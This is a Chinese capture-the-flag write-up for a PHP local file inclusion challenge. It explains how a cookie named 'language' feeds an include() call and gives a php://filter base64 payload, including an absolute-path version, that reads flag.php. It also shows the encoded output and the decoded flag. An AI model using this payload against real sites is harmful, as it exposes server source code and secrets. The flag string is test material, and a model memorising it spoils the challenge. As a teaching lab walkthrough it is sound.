打开链接，提示flag在flag.php里

 内容里还有一个路径/var/www/html/index.php，猜测flag.php应该也是在这个路径下

Ctrl+u查看网页源码

代码中发现 @include($lan.".php"); 

可知这里存在文件包

且包含与lan的值有关

由代码 $lan = $_COOKIE['language'];

可知lan的值是从cookie的值传上去的

所以这里我们对language赋值

if(!$lan)
{
    @setcookie("language","english");
    @include("english.php");
}

如果lan的值为0，则会设置一个新的cookie，这并不是我们想要的，我们要使传入的lan不为0，即cookie的赋值不能为空。

else
{
    @include($lan.".php");
}

当cookie不为空时，lan的值会和".php"拼起来

我们使用php://filter伪协议来读取flag.php的源码并进行base64编码输出

当它与包含函数结合时，php://filter流会被当作php文件执行

这里要注意我们指定的文件应该是flag而不是flag.php

（因为前面说了当cookie不为空时这个lan值会去和".php"进行拼接）

所以我们这里只需在cookie传入language=php://filter/read=convert.base64-encode/resource=flag

或者使用绝对路径

language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag

读取到

PD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezg5ZjcwNGMzNWIxMzNjODI1NDliMzAyYTFjMzM1Mjk5fSI7DQo/Pg==  

将输出进行base64解码

或者直接在hackbar进行base64decode

 得到

$flag="cyberpeace{89f704c35b133c82549b302a1c335299}